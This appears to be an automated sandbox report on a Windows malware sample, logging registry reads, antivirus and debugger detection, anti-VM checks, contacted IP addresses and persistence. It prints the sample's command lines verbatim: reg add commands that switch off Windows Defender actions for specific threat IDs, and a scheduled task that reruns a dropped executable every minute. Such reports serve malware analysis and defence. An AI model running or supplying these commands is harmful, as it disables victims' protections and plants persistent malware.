RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: WIC base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (18 events)

cmdline	forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
cmdline	forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F
cmdline	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline	cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline	forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

One or more of the buffers contains an embedded PE file (3 events)

buffer	Buffer with sha1: 863adc898977b4e9694b3dc86d6886a16d702959
buffer	Buffer with sha1: 54a07d567c7f3ce77af3d8403de985c8b72c4f7c
buffer	Buffer with sha1: 6269c76c5ddc8e49c52a98fc2b0949ccbc360ff1

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (13 events)

host	147.45.47.149
host	147.45.47.70
host	185.172.128.159
host	185.172.128.19
host	185.172.128.69
host	185.172.128.82
host	185.215.113.67
host	5.42.66.10
host	5.42.66.47
host	77.91.77.33
host	85.192.56.26
host	91.202.233.232
host	94.232.45.38

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory May 31, 2024, 7:33 a.m.	process_identifier: 1872 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000218	1	0	0
NtAllocateVirtualMemory May 31, 2024, 7:35 a.m.	process_identifier: 3228 region_size: 1662976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000260	1	0	0

Attempts to identify installed AV products by installation directory (9 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\Program Files (x86)\1717128839_0\DeepScan\SDEng\AviraImp.dll.bak
file	C:\Program Files (x86)\1717128839_0\DeepScan\SDEng\AviraImp.dll
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to identify installed AV products by registry key (30 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\Avg
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast
registry	HKEY_LOCAL_MACHINE\SOFTWARE\AVAST Software\Avast
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Avira
registry	HKEY_LOCAL_MACHINE\SOFTWARE\BitDefender\BitDefender Desktop\Maintenance\Install
registry	HKEY_LOCAL_MACHINE\SOFTWARE\BitDefender\360杀毒
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Coranti
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Data fellows\F-Secure\F-Secure GUI\PUB
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Data Fellows\F-Secure\F-Secure GUI\PUB
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Data fellows\F-Secure\F-Secure GUI
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Doctor Web, Ltd.
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Doctor Web\InstalledComponents
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Eset\NOD\CurrentVersion\Info
registry	HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info
registry	HKEY_LOCAL_MACHINE\SOFTWARE\G DATA\AntiVirenKit
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\InstalledApps
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Symantec
registry	HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\sdk\avp8\environment
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Panda Software\Setup
registry	HKEY_LOCAL_MACHINE\SOFTWARE\rising\Ris
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Rising\Rav
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SweepNT
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Application
registry	HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\Vizor
registry	HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion
registry	HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\ServerProtect
registry	HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillin
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Vba32
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\ZoneAlarm

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 406 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA May 31, 2024, 7:29 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 31, 2024, 7:29 a.m.	class_name: OLLYDBG window_name:		0	0

A process attempted to delay the analysis task. (4 events)

description	Newoff.exe tried to sleep 135 seconds, actually delayed analysis time by 135 seconds
description	mpVxwmaUWkvooa27wKUZd6Do.exe tried to sleep 471 seconds, actually delayed analysis time by 471 seconds
description	axplont.exe tried to sleep 1350 seconds, actually delayed analysis time by 1350 seconds
description	explorer.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (15 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray	reg_value	"C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe" /start
service_name	360AntiHacker	service_path	C:\Program Files (x86)\1717128839_0\System32\Drivers\360AntiHacker64.sys
service_name	360AvFlt	service_path	C:\Windows\System32\drivers\360AvFlt.sys
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\360AvFlt\ImagePath	reg_value	system32\DRIVERS\360AvFlt.sys
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BAPIDRV\ImagePath	reg_value	system32\DRIVERS\BAPIDRV64.sys
service_name	360netmon	service_path	C:\Windows\System32\drivers\360netmon.sys
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\360netmon\ImagePath	reg_value	system32\DRIVERS\360netmon.sys
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\360Box64\ImagePath	reg_value	system32\DRIVERS\360Box64.sys
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\360Box64\ImagePath	reg_value	system32\DRIVERS\360Box64.sys
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ImagePath	reg_value	"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\(Default)	reg_value	C:\Program Files (x86)\360\Total Security\MenuEx64.dll
service_name	QHActiveDefense	service_path	C:\Program Files (x86)\1717128839_0\"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe"
file	C:\Windows\Tasks\axplont.job
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F

Operates on local firewall's policies and settings (1 event)

registry

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Created a service where a service was also not started (6 events)

Time & API	Arguments	Status	Return
CreateServiceW May 31, 2024, 7:34 a.m.	service_start_name: start_type: 3 password: display_name: 360Safe Camera Filter Service filepath: C:\Program Files (x86)\1717128839_0\System32\Drivers\360Camera64.sys service_name: 360Camera filepath_r: System32\Drivers\360Camera64.sys desired_access: 983551 service_handle: 0x0ebe7768 error_control: 1 service_type: 1 service_manager_handle: 0x0ebe7998	1	247363432
